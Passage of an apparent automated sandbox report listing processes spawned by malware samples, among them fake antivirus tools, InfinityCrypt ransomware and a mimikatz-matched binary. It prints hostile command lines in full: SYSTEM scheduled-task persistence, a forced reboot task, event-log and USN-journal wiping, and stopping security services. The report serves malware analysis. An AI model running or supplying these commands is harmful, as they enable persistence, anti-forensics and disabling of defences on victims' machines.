                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:c:\windows\antivirus-platinum.exe
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:9728 bytes
                                                                                                                                                MD5 hash:CD1800322CCFC425014A8394B01A4B3D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:Visual Basic

                                                                                                                                                Target ID:27
                                                                                                                                                Start time:14:52:28
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exe"
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:195400 bytes
                                                                                                                                                MD5 hash:248AADD395FFA7FFB1670392A9398454
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Antivirus matches:
                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                • Detection: 70%, ReversingLabs
                                                                                                                                                • Detection: 60%, Metadefender, Browse

                                                                                                                                                Target ID:28
                                                                                                                                                Start time:14:52:29
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:attrib +h c:\windows\antivirus-platinum.exe
                                                                                                                                                Imagebase:0x830000
                                                                                                                                                File size:19456 bytes
                                                                                                                                                MD5 hash:A5540E9F87D4CB083BDF8269DEC1CFF9
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:29
                                                                                                                                                Start time:14:52:29
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:/c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 2633966292 && exit"
                                                                                                                                                Imagebase:0x11d0000
                                                                                                                                                File size:232960 bytes
                                                                                                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:30
                                                                                                                                                Start time:14:52:31
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff7fcd70000
                                                                                                                                                File size:625664 bytes
                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:31
                                                                                                                                                Start time:14:52:31
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Windows\system32\netsh.exe advfirewall set allprofiles state on
                                                                                                                                                Imagebase:0x1280000
                                                                                                                                                File size:82944 bytes
                                                                                                                                                MD5 hash:A0AA3322BB46BBFC36AB9DC1DBBBB807
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:32
                                                                                                                                                Start time:14:52:31
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff7fcd70000
                                                                                                                                                File size:625664 bytes
                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:33
                                                                                                                                                Start time:14:52:31
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 2633966292 && exit"
                                                                                                                                                Imagebase:0x1170000
                                                                                                                                                File size:185856 bytes
                                                                                                                                                MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:34
                                                                                                                                                Start time:14:52:31
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Users\user\Desktop\Endermanch@HappyAntivirus.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\Desktop\Endermanch@HappyAntivirus.exe"
                                                                                                                                                Imagebase:0xb40000
                                                                                                                                                File size:2007552 bytes
                                                                                                                                                MD5 hash:CB02C0438F3F4DDABCE36F8A26B0B961
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                                                                Antivirus matches:
                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                • Detection: 37%, ReversingLabs
                                                                                                                                                • Detection: 36%, Metadefender, Browse

                                                                                                                                                Target ID:35
                                                                                                                                                Start time:14:52:32
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:/c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 15:10:00
                                                                                                                                                Imagebase:0x11d0000
                                                                                                                                                File size:232960 bytes
                                                                                                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:36
                                                                                                                                                Start time:14:52:33
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Windows\system32\netsh.exe advfirewall reset
                                                                                                                                                Imagebase:0x1280000
                                                                                                                                                File size:82944 bytes
                                                                                                                                                MD5 hash:A0AA3322BB46BBFC36AB9DC1DBBBB807
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:37
                                                                                                                                                Start time:14:52:33
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff7fcd70000
                                                                                                                                                File size:625664 bytes
                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:38
                                                                                                                                                Start time:14:52:34
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /C Start "" "C:\Windows\dispci.exe" -id 2633966292 && exit
                                                                                                                                                Imagebase:0x7ff627730000
                                                                                                                                                File size:273920 bytes
                                                                                                                                                MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:39
                                                                                                                                                Start time:14:52:34
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff7fcd70000
                                                                                                                                                File size:625664 bytes
                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:40
                                                                                                                                                Start time:14:52:34
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\3F22.tmp
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:"C:\Windows\3F22.tmp" \\.\pipe\{C1B24DF3-0828-43A8-B4E0-909C189DD6EB}
                                                                                                                                                Imagebase:0x7ff730b90000
                                                                                                                                                File size:62328 bytes
                                                                                                                                                MD5 hash:347AC3B6B791054DE3E5720A7144A977
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: mimikatz, Description: mimikatz, Source: 00000028.00000002.509874585.00007FF730B9E000.00000004.00000001.01000000.0000001F.sdmp, Author: Benjamin DELPY (gentilkiwi)
                                                                                                                                                • Rule: mimikatz, Description: mimikatz, Source: 00000028.00000000.495939714.00007FF730B9E000.00000008.00000001.01000000.0000001F.sdmp, Author: Benjamin DELPY (gentilkiwi)
                                                                                                                                                • Rule: mimikatz, Description: mimikatz, Source: 00000028.00000000.495419443.00007FF730B9E000.00000008.00000001.01000000.0000001F.sdmp, Author: Benjamin DELPY (gentilkiwi)
                                                                                                                                                • Rule: mimikatz, Description: mimikatz, Source: 00000028.00000000.502691243.00007FF730B9E000.00000008.00000001.01000000.0000001F.sdmp, Author: Benjamin DELPY (gentilkiwi)

                                                                                                                                                Target ID:41
                                                                                                                                                Start time:14:52:35
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 15:10:00
                                                                                                                                                Imagebase:0x1010000
                                                                                                                                                File size:185856 bytes
                                                                                                                                                MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:42
                                                                                                                                                Start time:14:52:39
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff7fcd70000
                                                                                                                                                File size:625664 bytes
                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:43
                                                                                                                                                Start time:14:52:44
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff7fcd70000
                                                                                                                                                File size:625664 bytes
                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:44
                                                                                                                                                Start time:14:52:43
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Users\user\AppData\Local\6AdwCleaner.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\6AdwCleaner.exe"
                                                                                                                                                Imagebase:0xe50000
                                                                                                                                                File size:172648 bytes
                                                                                                                                                MD5 hash:87E4959FEFEC297EBBF42DE79B5C88F6
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                                                                Antivirus matches:
                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                • Detection: 60%, ReversingLabs
                                                                                                                                                • Detection: 52%, Metadefender, Browse

                                                                                                                                                Target ID:45
                                                                                                                                                Start time:14:52:43
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:/c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
                                                                                                                                                Imagebase:0x11d0000
                                                                                                                                                File size:232960 bytes
                                                                                                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:46
                                                                                                                                                Start time:14:52:43
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe"
                                                                                                                                                Imagebase:0x310000
                                                                                                                                                File size:216064 bytes
                                                                                                                                                MD5 hash:B805DB8F6A84475EF76B795B0D1ED6AE
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_infinitylock, Description: Yara detected InfinityLock Ransomware, Source: 0000002E.00000000.514937121.0000000000312000.00000002.00000001.01000000.00000022.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_infinitylock, Description: Yara detected InfinityLock Ransomware, Source: 0000002E.00000000.515393247.0000000000323000.00000002.00000001.01000000.00000022.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_infinitylock, Description: Yara detected InfinityLock Ransomware, Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe, Author: Joe Security
                                                                                                                                                • Rule: MALWARE_Win_InfinityLock, Description: Detects InfinityLock ransomware, Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe, Author: ditekSHen
                                                                                                                                                Antivirus matches:
                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                • Detection: 85%, ReversingLabs
                                                                                                                                                • Detection: 60%, Metadefender, Browse

                                                                                                                                                Target ID:47
                                                                                                                                                Start time:14:52:45
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff7fcd70000
                                                                                                                                                File size:625664 bytes
                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:48
                                                                                                                                                Start time:14:52:46
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\SysWOW64\wevtutil.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:wevtutil cl Setup
                                                                                                                                                Imagebase:0x2f0000
                                                                                                                                                File size:167936 bytes
                                                                                                                                                MD5 hash:27C3944EC1E3CAD62641ECBCEB107EE9
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:49
                                                                                                                                                Start time:14:52:46
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Users\user\Desktop\Endermanch@InternetSecurityGuard.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\Desktop\Endermanch@InternetSecurityGuard.exe"
                                                                                                                                                Imagebase:0x13140000
                                                                                                                                                File size:6438912 bytes
                                                                                                                                                MD5 hash:04155ED507699B4E37532E8371192C0B
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:Borland Delphi
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000031.00000000.521029306.0000000013141000.00000020.00000001.01000000.00000024.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Desktop\Endermanch@InternetSecurityGuard.exe, Author: Joe Security
                                                                                                                                                Antivirus matches:
                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                • Detection: 64%, Metadefender, Browse
                                                                                                                                                • Detection: 85%, ReversingLabs

                                                                                                                                                Target ID:50
                                                                                                                                                Start time:14:52:48
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:/c schtasks /Delete /F /TN drogon
                                                                                                                                                Imagebase:0x11d0000
                                                                                                                                                File size:232960 bytes
                                                                                                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:51
                                                                                                                                                Start time:14:52:48
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\SysWOW64\net.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:net stop wscsvc
                                                                                                                                                Imagebase:0xd20000
                                                                                                                                                File size:46592 bytes
                                                                                                                                                MD5 hash:DD0561156F62BC1958CE0E370B23711B
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:52
                                                                                                                                                Start time:14:52:49
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff7fcd70000
                                                                                                                                                File size:625664 bytes
                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:53
                                                                                                                                                Start time:14:52:49
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\SysWOW64\net.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:net stop winmgmt /y
                                                                                                                                                Imagebase:0xd20000
                                                                                                                                                File size:46592 bytes
                                                                                                                                                MD5 hash:DD0561156F62BC1958CE0E370B23711B
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:54
                                                                                                                                                Start time:14:52:49
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                Imagebase:0x7ff6ffff0000
                                                                                                                                                File size:51288 bytes
                                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:55
                                                                                                                                                Start time:14:52:49
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff7fcd70000
                                                                                                                                                File size:625664 bytes
                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:56
                                                                                                                                                Start time:14:52:50
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\SysWOW64\net.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:net start winmgmt
                                                                                                                                                Imagebase:0xd20000
                                                                                                                                                File size:46592 bytes
                                                                                                                                                MD5 hash:DD0561156F62BC1958CE0E370B23711B
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:57
                                                                                                                                                Start time:14:52:50
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff7fcd70000
                                                                                                                                                File size:625664 bytes
                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:58
                                                                                                                                                Start time:14:52:50
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4652 -ip 4652
                                                                                                                                                Imagebase:0xfd0000
                                                                                                                                                File size:434592 bytes
                                                                                                                                                MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:59
                                                                                                                                                Start time:14:52:50
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\SysWOW64\net.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:net start wscsvc
                                                                                                                                                Imagebase:0xd20000
                                                                                                                                                File size:46592 bytes
                                                                                                                                                MD5 hash:DD0561156F62BC1958CE0E370B23711B
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:60
                                                                                                                                                Start time:14:52:50
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\SysWOW64\net1.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Windows\system32\net1 stop wscsvc
                                                                                                                                                Imagebase:0x10c0000
                                                                                                                                                File size:141312 bytes
                                                                                                                                                MD5 hash:B5A26C2BF17222E86B91D26F1247AF3E
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:61
                                                                                                                                                Start time:14:52:50
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff7fcd70000
                                                                                                                                                File size:625664 bytes
                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:62
                                                                                                                                                Start time:14:52:50
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\SysWOW64\wevtutil.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:wevtutil cl System
                                                                                                                                                Imagebase:0x2f0000
                                                                                                                                                File size:167936 bytes
                                                                                                                                                MD5 hash:27C3944EC1E3CAD62641ECBCEB107EE9
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:63
                                                                                                                                                Start time:14:52:51
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\SysWOW64\wbem\mofcomp.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:mofcomp C:\Users\user\AppData\Local\Temp\4otjesjty.mof
                                                                                                                                                Imagebase:0x11c0000
                                                                                                                                                File size:19968 bytes
                                                                                                                                                MD5 hash:D8CE382C476699434A26272E8B7D5526
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:64
                                                                                                                                                Start time:14:52:51
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:schtasks /Delete /F /TN drogon
                                                                                                                                                Imagebase:0x1170000
                                                                                                                                                File size:185856 bytes
                                                                                                                                                MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:65
                                                                                                                                                Start time:14:52:51
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff7fcd70000
                                                                                                                                                File size:625664 bytes
                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Reset < >

                                                                                                                                                  Execution Graph

                                                                                                                                                  Execution Coverage:18.6%
                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                  Signature Coverage:6.3%
                                                                                                                                                  Total number of Nodes:1805
                                                                                                                                                  Total number of Limit Nodes:28
